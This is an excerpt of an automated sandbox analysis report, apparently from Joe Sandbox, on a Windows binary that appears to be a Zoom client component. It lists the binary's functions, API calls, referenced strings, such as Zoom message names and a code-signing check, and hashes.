                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(&#x300b;,00000001,0000300B,?,?,&#x300a;,00000001,0000300A,?,?,&#x232a;,00000001,0000232A,?,?,&#x2329;), ref: 00C5A260
                • ?Replace@?$CStringT@_W@Cmm@@QAEXABV12@0@Z.RWSNDPQSKZ(?,?,&#x300b;,00000001,0000300B,?,?,&#x300a;,00000001,0000300A,?,?,&#x232a;,00000001,0000232A,?), ref: 00C5A273
                  • Part of subcall function 00C53750: ?Replace@?$CStringT@_W@Cmm@@QAEXPB_W0@Z.RWSNDPQSKZ(?,?,?,00C5A1BE,?,?,&#x2329;,00000001,00002329,?,?,0000003C,00D33414,&apos;,00D333F4,&quot;), ref: 00C53771
                  • Part of subcall function 00C57BE9: _Deallocate.LIBCONCRT ref: 00C57BFE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$String$Replace@?$std::_$??0?$LockitV12@0@$Lockit::_Lockit::~_$Concurrency::cancel_current_taskDeallocateFacet_H_prolog3H_prolog3_RegisterState@Unlock@
                • String ID: &#x2329;$&#x232a;$&#x300a;$&#x300b;
                • API String ID: 3868370899-2233866962
                • Opcode ID: 623f29c3cbe816f485f00e985e2b4cbfde135de66ef32b073bb6199dfea68c62
                • Instruction ID: 8f05af561159b37b65fd5e11f0fd39dba437e581413beeb28dccb835866d695b
                • Opcode Fuzzy Hash: 623f29c3cbe816f485f00e985e2b4cbfde135de66ef32b073bb6199dfea68c62
                • Instruction Fuzzy Hash: DD51AE79D002489BCB05EBA4D956BEDBBB8AF08311F148019E811B7381DF745B8DEB65
                Function 00CA6A0E Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 183COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CA6A18
                • ?QueryStringAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.RWSNDPQSKZ(name,00000000,00000108,00CA6E71,00000000,00DFF9D0,module,?,?,00000000), ref: 00CA6A85
                  • Part of subcall function 00CA4870: ?Attribute@XMLElement@tinyxml2@@QBEPBDPBD0@Z.RWSNDPQSKZ(?,00000000,?), ref: 00CA488A
                • ?QueryStringAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.RWSNDPQSKZ(type,?,name,00000000,00000108,00CA6E71,00000000,00DFF9D0,module,?,?,00000000), ref: 00CA6A95
                • ?QueryStringAttribute@XMLElement@tinyxml2@@QBE?AW4XMLError@2@PBDPAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.RWSNDPQSKZ(caps,?,type,?,name,00000000,00000108,00CA6E71,00000000,00DFF9D0,module,?,?,00000000), ref: 00CA6AA5
                • ??0?$CStringT@D@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(LoadModule - ,caps,?,type,?,name,00000000,00000108,00CA6E71,00000000,00DFF9D0,module), ref: 00CA6ABF
                  • Part of subcall function 00C562D0: __EH_prolog3.LIBCMT ref: 00C562D7
                • ??0?$CStringT@D@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(CmmPTUtil,00000000,caps,?,type,?,name,00000000,00000108,00CA6E71,00000000,00DFF9D0,module), ref: 00CA6AE2
                • ??0CCmmPerfTelemetryStacks@@QAE@ABV?$CStringT@D@Cmm@@0H@Z.RWSNDPQSKZ(?,?,00000000,00000000,caps,?,type,?,name,00000000,00000108,00CA6E71,00000000,00DFF9D0,module), ref: 00CA6B01
                  • Part of subcall function 00CB4FE0: __EH_prolog3.LIBCMT ref: 00CB4FE7
                  • Part of subcall function 00CB4FE0: GetTickCount.KERNEL32 ref: 00CB5022
                  • Part of subcall function 00C58567: _Deallocate.LIBCONCRT ref: 00C58576
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,00000000,.dll), ref: 00CA6B82
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,?,?,00000000,.dll), ref: 00CA6BA2
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001), ref: 00CA6BB8
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?), ref: 00CA6C00
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000), ref: 00CA6C16
                • ??1CCmmPerfTelemetryStacks@@QAE@XZ.RWSNDPQSKZ(?,00000000,.dll), ref: 00CA6C40
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@String$Attribute@Element@tinyxml2@@State@Unlock@$??0?$D@2@@std@@@D@std@@Error@2@QueryU?$char_traits@V?$allocator@V?$basic_string@$H_prolog3PerfStacks@@Telemetry$Cmm@@0CountDeallocateH_prolog3_TickV01@@
                • String ID: .dll$CmmPTUtil$LoadModule - $caps$name$type
                • API String ID: 3087048408-1071006847
                • Opcode ID: d17c0a7f6742acbe46e8cc3ce8cf7b93ad6707b6334a3a8a033006a8db95d725
                • Instruction ID: b89f2b80b512c64f3c4bc926e19dc7f18fda38f561600086e3306f61aab684b4
                • Opcode Fuzzy Hash: d17c0a7f6742acbe46e8cc3ce8cf7b93ad6707b6334a3a8a033006a8db95d725
                • Instruction Fuzzy Hash: 97717D74E003199FCB14EFA4C881AEDBBB5AF59314F544099E809B7342DB706E89DF61
                Function 00C94EE5 Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 145COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C94EEC
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C75A39), ref: 00C94F00
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.share.meeting.chat.req,00000044,00C75A39), ref: 00C94F32
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,com.Zoom.app.conf.share.meeting.chat.req,00000044,00C75A39), ref: 00C94F6F
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.share.meeting.chat.req,?,-00000004,com.Zoom.app.conf.share.meeting.chat.req,00000044,00C75A39), ref: 00C94FA1
                • EnterCriticalSection.KERNEL32(?,?), ref: 00C95097
                • LeaveCriticalSection.KERNEL32(?,?,?), ref: 00C950B4
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004,com.Zoom.app.conf.share.meeting.chat.req,00000044,00C75A39), ref: 00C950C7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.Zoom.app.conf.share.meeting.chat.req$lastIsNewSession$lastOperatorAccId$lastOperatorJid$lastSessionId$lastSessionName$lastSessionOption$lastSessionType$meetingId$meetingTopic$myAccountId
                • API String ID: 1443623190-1345633161
                • Opcode ID: 6b634132eae2a06b2e29c7830a9d225af5c4a0ea06c795cffd5bac445e5ec132
                • Instruction ID: 133e11e3cce060a4ac0127394fba186a4d86da08af17ad455cd5f04c5bd2a52c
                • Opcode Fuzzy Hash: 6b634132eae2a06b2e29c7830a9d225af5c4a0ea06c795cffd5bac445e5ec132
                • Instruction Fuzzy Hash: 0351D674F01B059BCF29EBA0C84969D7675AF45301F144028EC12AB391DF70DE8ADBEA
                Function 00C8A113 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 135COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8A11A
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6AEDE), ref: 00C8A12E
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.startcallout,00000044,00C6AEDE), ref: 00C8A160
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(00C6AEDE,-00000004,com.Zoom.app.conf.startcallout,00000044,00C6AEDE), ref: 00C8A19D
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.startcallout,00C6AEDE,-00000004,com.Zoom.app.conf.startcallout,00000044,00C6AEDE), ref: 00C8A1CF
                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00002737,Calloutnumber,Username,bUseDTMF,bNoDialTone), ref: 00C8A29D
                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00002737,Calloutnumber,Username,bUseDTMF), ref: 00C8A2BA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@Tree
                • String ID: Calloutnumber$Username$bEnhanceInviteCallOut$bGreeting$bNoDialTone$bPressOne$bUseDTMF$com.Zoom.app.conf.startcallout$strCallId
                • API String ID: 89596651-2029554168
                • Opcode ID: 81ea239e962a87959cf4fe38f83aa8c9fcb2de3a071c519a2634ced24a824939
                • Instruction ID: 6f0020628be016ef76d4dc23bc6b7a2e9929d80ecd9e26e3bdde675bb77cecbe
                • Opcode Fuzzy Hash: 81ea239e962a87959cf4fe38f83aa8c9fcb2de3a071c519a2634ced24a824939
                • Instruction Fuzzy Hash: FC41E130A00614ABDF24EFA4D9056ADB7B5AF44309F044029E816EB385DF34DF4ADB6E
                Function 00C8C6F2 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 135COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8C6F9
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6C6DE), ref: 00C8C70D
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.inter.process.audio.sharing.service.register.response,00000044,00C6C6DE), ref: 00C8C73F
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(00C6C6DE,-00000004,com.Zoom.app.conf.inter.process.audio.sharing.service.register.response,00000044,00C6C6DE), ref: 00C8C77C
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.inter.process.audio.sharing.service.register.response,00C6C6DE,-00000004,com.Zoom.app.conf.inter.process.audio.sharing.service.register.response,00000044,00C6C6DE), ref: 00C8C7AE
                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000027D6,result,mixedFMName,userFMName,shareFMName), ref: 00C8C87C
                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,000027D6,result,mixedFMName,userFMName), ref: 00C8C899
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@Tree
                • String ID: com.Zoom.app.conf.inter.process.audio.sharing.service.register.response$maxChannel$mixedFMName$result$sampleDepth$samplesPerFrame$shareFMName$smapleRate$userFMName
                • API String ID: 89596651-1114125151
                • Opcode ID: 1ce5b384a17d3557e05928879550dc247c9e2b4ebbd2906dbb360f4bc9df234a
                • Instruction ID: 9ef244f367722819f8b5f625657be96a72e06ea1c0ebaf86c7a7f49c11978810
                • Opcode Fuzzy Hash: 1ce5b384a17d3557e05928879550dc247c9e2b4ebbd2906dbb360f4bc9df234a
                • Instruction Fuzzy Hash: 7641A034E007049BCF15EBA4C99669D76A5AF94305F084128EC12AB3D1DF70DE8ADBB9
                Function 00C8A9E7 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 135COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8A9EE
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6B59F), ref: 00C8AA02
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.custom3DAvatar.uptoweb.update,00000044,00C6B59F), ref: 00C8AA34
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(00C6B59F,-00000004,com.Zoom.app.conf.custom3DAvatar.uptoweb.update,00000044,00C6B59F), ref: 00C8AA71
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.custom3DAvatar.uptoweb.update,00C6B59F,-00000004,com.Zoom.app.conf.custom3DAvatar.uptoweb.update,00000044,00C6B59F), ref: 00C8AAA3
                • EnterCriticalSection.KERNEL32(?), ref: 00C8AB71
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C8AB8E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@Tree
                • String ID: auto_generated_additional_data$avatar_version$com.Zoom.app.conf.custom3DAvatar.uptoweb.update$component_data$index$is_auto_generated$old_file_id$thumbnail_path$type
                • API String ID: 89596651-3790094516
                • Opcode ID: 25dfa22dc6a18777159282953725df7ed34d6e9b8b184fcc381e277e5e8da773
                • Instruction ID: 7866a11b823cfcb73952bac5db0bbbe8fe1623f340a7bfdb9f1847108c50cc5e
                • Opcode Fuzzy Hash: 25dfa22dc6a18777159282953725df7ed34d6e9b8b184fcc381e277e5e8da773
                • Instruction Fuzzy Hash: 23412774A00B049BDF15FBA4D9056ADB776AF44309F044029EC12AB391EF30DE4ADB6E
                Function 00CB84C0 Relevance: 29.8, APIs: 1, Strings: 16, Instructions: 53COMMON
                Download Yara Rule
                APIs
                Strings
                • sync_comment_count_handler, xrefs: 00CB8534
                • undefined_fetch_handler, xrefs: 00CB8565
                • sync_single_thread_handler, xrefs: 00CB853B
                • xmpp_parse_data_handler, xrefs: 00CB855E
                • fetch_emoji_info_handler, xrefs: 00CB84FC
                • fetch_jump_thread_handler, xrefs: 00CB850A
                • http_switch_handler, xrefs: 00CB8557
                • sync_thread_comment_count_handler, xrefs: 00CB852D
                • sync_thread_comment_countex_handler, xrefs: 00CB8550
                • fetch_history_comment_handler, xrefs: 00CB8511
                • request_optionkeys_handler, xrefs: 00CB8542
                • emoji_action_result_handler, xrefs: 00CB8526
                • fetch_emoji_count_info_handler, xrefs: 00CB851F
                • sync_thread_handler, xrefs: 00CB8503
                • base_request_handler, xrefs: 00CB8549
                • fetch_history_thread_handler, xrefs: 00CB8518
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: H_prolog3
                • String ID: base_request_handler$emoji_action_result_handler$fetch_emoji_count_info_handler$fetch_emoji_info_handler$fetch_history_comment_handler$fetch_history_thread_handler$fetch_jump_thread_handler$http_switch_handler$request_optionkeys_handler$sync_comment_count_handler$sync_single_thread_handler$sync_thread_comment_count_handler$sync_thread_comment_countex_handler$sync_thread_handler$undefined_fetch_handler$xmpp_parse_data_handler
                • API String ID: 431132790-3961229391
                • Opcode ID: 783e9078f353841644bcd58350f70e7140cbf067d7384db403962554cef6de68
                • Instruction ID: 13233c3ecbf922e4b94d77b77648c818a937529998fbc9706ac92e794a12a8a6
                • Opcode Fuzzy Hash: 783e9078f353841644bcd58350f70e7140cbf067d7384db403962554cef6de68
                • Instruction Fuzzy Hash: 4A011BA0648344EEE732DE156D029A877AA7724F06F3045167047661C4CEF5574CFF62
                Function 00CDA360 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 158memoryencryptionCOMMON
                Download Yara Rule
                APIs
                • WTHelperProvDataFromStateData.WINTRUST(?,00000000,00000000,?,?,?,?,?,?,?,?,?,00CDA66B), ref: 00CDA37A
                • WTHelperGetProvSignerFromChain.WINTRUST(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00CDA66B), ref: 00CDA3A7
                • WTHelperGetProvCertFromChain.WINTRUST(00000000,00000000,?,?,?,?,?,?,?,?,00CDA66B), ref: 00CDA3CA
                • CertGetNameStringW.CRYPT32(?,00000004,00000000,00000000,00000000,00000000), ref: 00CDA3EE
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00CDA491
                • HeapFree.KERNEL32(00000000), ref: 00CDA498
                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00CDA66B), ref: 00CDA4DB
                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00CDA66B), ref: 00CDA4E2
                Strings
                • Entrust Root Certification Authority, xrefs: 00CDA4B8
                • Zoom Video Communications, Inc., xrefs: 00CDA464
                • DigiCert, xrefs: 00CDA4C8
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Heap$FromHelperProv$CertChainDataFreeProcess$NameSignerStateString
                • String ID: DigiCert$Entrust Root Certification Authority$Zoom Video Communications, Inc.
                • API String ID: 1193424130-3496748739
                • Opcode ID: f043f48905ff7b039680fbad40ce435689180f948e82906efe59fc1071136d71
                • Instruction ID: 9d78104b689a976a809c7e41e90879ad9a144f2b7e765404ded757a605019274
                • Opcode Fuzzy Hash: f043f48905ff7b039680fbad40ce435689180f948e82906efe59fc1071136d71
                • Instruction Fuzzy Hash: EF51B670A40314AFDB209FA59C48BAEBBB5FF48705F14446AEB15E7341DBB4CA02CB65
                Function 00C524C1 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 146windowthreadtimeCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C524CB
                  • Part of subcall function 00CD4250: SetDllDirectoryW.KERNEL32(00D34CD0), ref: 00CD4271
                  • Part of subcall function 00CD4250: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003), ref: 00CD42A7
                  • Part of subcall function 00CD4250: VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003), ref: 00CD42B3
                  • Part of subcall function 00CD4250: VerSetConditionMask.KERNEL32(00000000,?,00000020,00000003), ref: 00CD42BF
                  • Part of subcall function 00CD4250: VerSetConditionMask.KERNEL32(00000000,?,00000010,00000003), ref: 00CD42CB
                  • Part of subcall function 00CD4250: VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 00CD42DA
                  • Part of subcall function 00CD4250: GetLastError.KERNEL32(?,?,00000010,00000003,?,00000020,00000003,?,00000001,00000003), ref: 00CD42E4
                  • Part of subcall function 00CD4250: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000001), ref: 00CD4330
                  • Part of subcall function 00CD4250: VerSetConditionMask.KERNEL32(00000000,?,00000001,00000001), ref: 00CD433C
                  • Part of subcall function 00CD4250: VerifyVersionInfoW.KERNEL32(?,00000003,00000000), ref: 00CD434B
                • ?GetModuleFilePath@CFileName@Cmm@@QAEXPAUHINSTANCE__@@@Z.RWSNDPQSKZ(00000000,?,?,?,?,?,?,?,?,?,?,?,000000B0), ref: 00C524F9
                  • Part of subcall function 00C523E0: ?GetModuleFileNameW@CFileName@Cmm@@QAEXPAUHINSTANCE__@@@Z.RWSNDPQSKZ(?), ref: 00C523EB
                  • Part of subcall function 00C523E0: ?GetPath@CFileName@Cmm@@QBE?AV?$CFnRangeT@_W@2@H@Z.RWSNDPQSKZ(?,00000000), ref: 00C523F8
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,?,000000B0), ref: 00C5250D
                  • Part of subcall function 00C54490: __EH_prolog3.LIBCMT ref: 00C54497
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(\ZoomOutlookMAPI,?,?,?,?,?,?,?,?,?,?,?,?,000000B0), ref: 00C52520
                  • Part of subcall function 00C57BE9: _Deallocate.LIBCONCRT ref: 00C57BFE
                • ??0?$CStringT@_W@Cmm@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.RWSNDPQSKZ(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,-00000004,00000000), ref: 00C5255C
